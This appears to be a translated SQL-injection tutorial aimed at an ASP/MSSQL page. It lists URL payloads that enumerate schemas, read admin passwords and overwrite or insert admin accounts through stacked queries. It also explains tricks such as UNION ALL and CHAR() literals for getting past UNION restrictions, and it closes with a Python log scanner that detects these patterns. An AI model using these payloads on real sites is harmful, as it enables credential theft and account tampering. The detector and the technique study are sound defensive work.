Enumerating databases:
http://duck/index.asp?id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA--
The next database, excluding the one already found:
http://duck/index.asp?id=10 UNION SELECT TOP 1 SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME NOT IN ('database name')--

Enumerating tables:
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--
http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%login%'--

Enumerating columns:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
The next column:
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id')--
http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' AND COLUMN_NAME NOT IN ('login_id','login_name','password','details')--

Reading the contents of a column:
http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name='neo'--
http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name='delimiterity'--
http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password+'morpheus') FROM admin_login WHERE login_name='delimiterity'--
(The convert(int, ...) form relies on the server's type-conversion error message echoing the value, which is why detailed database errors should never reach the client.)

Modifying the contents of a column (stacked queries):
http://duck/index.asp?id=10; UPDATE admin_login SET password='newpas5' WHERE login_name='neo'--
http://duck/index.asp?id=10; INSERT INTO admin_login (login_id, login_name, password, details) VALUES (666, 'neo2', 'newpas5', 'NA')--

During injection against Access and MySQL we usually extract data through UNION. In MSSQL, however, UNION often does not work: if the page returns no error and OPENROWSET is unavailable, brute-force guessing is frequently all that is left. How can this be made usable? After some research, UNION SELECT in MSSQL turns out to be subject mainly to the following restrictions.

The first is that a UNION between a varchar/nvarchar column and an int column forces a conversion error. Here one can follow superhei's old article and use "and 1=2" so that the result set before the UNION is empty.

The second is that when the columns selected by the current statement are of type text, ntext or image, DISTINCT cannot be applied to them, and a plain UNION implicitly selects with DISTINCT. This is also why many search-type injection points can be enumerated with UNION: a search query rarely selects columns of those three types (image is binary and will not appear in a query whose output is echoed). Some time ago Niuke provided a solution: append ALL to the UNION, i.e. UNION ALL. It works remarkably well; an expert is an expert.

The last restriction is that a UNION between text/ntext and int columns is incompatible and raises an "operand type clash" error even when "and 1=2" leaves the preceding result set empty. A few days ago it occurred to us that the placeholders we habitually use, 1, 2, 3 and so on, are all int columns, so of course an error occurs when text or ntext columns sit in front of them. If quotation marks are added, i.e. '1', '2', '3' ..., the columns become char/varchar and there should be no error. But what if quotation marks are filtered at the injection point?

Because MSSQL does not handle hexadecimal literals well (in many places they must first be assigned with DECLARE/SET), use CHAR() instead: and 1=2 union all select char(49), char(50), ... Most restricted statements can also be executed normally in the form and 1=2 union all select char(49), char(50), null, null;-- but NULL produces no echo, which makes it hard to determine which columns are echoed. In general, UNION has trouble with text or ntext columns, and image is rarely used. So start with NULL in every position and then replace them with 1, 2, 3, 4 in turn; in this way the position of an image-type column can be forced out as well.
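As an added defender-side example (not code from the original post), the following Python scanner flags, in IIS W3C-style web logs, the request shapes this post describes: UNION SELECT against INFORMATION_SCHEMA, the "and 1=2 union all select" form, runs of CHAR() literals used when quotes are filtered, and stacked UPDATE/INSERT. The field order of the log lines and the sample lines themselves are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the techniques walked through above. They are matched
# against the decoded, lower-cased query string, so case and URL encoding do
# not hide them (regexes are ASCII-only; Unicode homoglyph tricks are out of scope).
SIGNATURES = {
    "union_select":       re.compile(r"\bunion\s+(all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\.(schemata|tables|columns)\b"),
    "empty_left_set":     re.compile(r"\band\s+1\s*=\s*2\b"),
    "char_literals":      re.compile(r"\bchar\s*\(\s*\d+\s*\)(\s*,\s*char\s*\(\s*\d+\s*\))+"),
    "stacked_write":      re.compile(r";\s*(update|insert)\b"),
}

def normalize(query: str) -> str:
    """URL-decode twice (catches double encoding), lower-case and collapse
    whitespace so the regexes see the SQL roughly as SQL Server would."""
    text = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", text).lower()

def scan_query(query: str) -> list[str]:
    """Return the names of every signature matched by one query string."""
    text = normalize(query)
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_iis_log(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """Assumed W3C field order: date time c-ip cs-method cs-uri-stem cs-uri-query ...
    Returns (client_ip, uri_stem, hits) for each request that matched a signature."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):   # skip blank and directive lines
            continue
        fields = line.split(" ")
        if len(fields) < 6:
            continue
        ip, stem, query = fields[2], fields[4], fields[5]
        hits = scan_query(query)
        if hits:
            findings.append((ip, stem, hits))
    return findings

# Constructed sample log lines (not real traffic) in the assumed W3C layout.
SAMPLE_LOG = [
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2024-01-01 10:00:00 203.0.113.5 GET /index.asp id=10 200",
    "2024-01-01 10:00:01 203.0.113.5 GET /index.asp id=10+union+select+top+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES-- 500",
    "2024-01-01 10:00:02 203.0.113.5 GET /index.asp id=10+and+1%3D2+union+all+select+char(49),char(50),null-- 200",
    "2024-01-01 10:00:03 198.51.100.7 GET /search.asp q=neo 200",
]

if __name__ == "__main__":
    for ip, stem, hits in scan_iis_log(SAMPLE_LOG):
        print(f"{ip} {stem}: {', '.join(hits)}")
```

A 500 status alongside these hits is the conversion-error probing described above; a 200 with the char()/null form is the quiet variant and deserves the same alert.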